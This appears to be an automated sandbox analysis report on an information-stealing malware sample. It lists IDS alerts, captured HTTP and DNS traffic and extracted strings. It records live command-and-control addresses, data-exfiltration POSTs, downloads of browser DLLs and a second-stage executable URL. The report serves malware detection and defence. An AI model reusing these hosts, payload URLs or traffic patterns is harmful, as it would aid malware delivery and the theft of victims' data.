                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49726 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49721 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49727 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49722 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49724 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49725 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49723 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49729 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49730 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49731 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49732 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49733 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49735 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49736 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49738 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49740 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49742 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49744 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49743 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49739 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49745 -> 147.45.44.104:80
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49749 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49737 -> 49.12.197.9:443
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49746 -> 49.12.197.9:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5669Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 98121Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
                          Source: global trafficHTTP traffic detected: GET /ldms/66fe13d251bbf_lsod.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 3157Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: unknownTCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00406963
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                          Source: global trafficHTTP traffic detected: GET /ldms/66fe13d251bbf_lsod.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: global trafficDNS traffic detected: DNS query: chorusarorp.site
                          Source: global trafficDNS traffic detected: DNS query: questionsmw.store
                          Source: global trafficDNS traffic detected: DNS query: soldiefieop.site
                          Source: global trafficDNS traffic detected: DNS query: abnomalrkmu.site
                          Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                          Source: global trafficDNS traffic detected: DNS query: treatynreit.site
                          Source: global trafficDNS traffic detected: DNS query: snarlypagowo.site
                          Source: global trafficDNS traffic detected: DNS query: mysterisop.site
                          Source: global trafficDNS traffic detected: DNS query: absorptioniw.site
                          Source: global trafficDNS traffic detected: DNS query: gravvitywio.store
                          Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exe
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exe$
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exe1kkkk1
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exeform-data;
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.BFIIDGDGDBAE
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.DGDBAE
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/w
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgBAE
                          Source: file.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoGDGDBAE
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
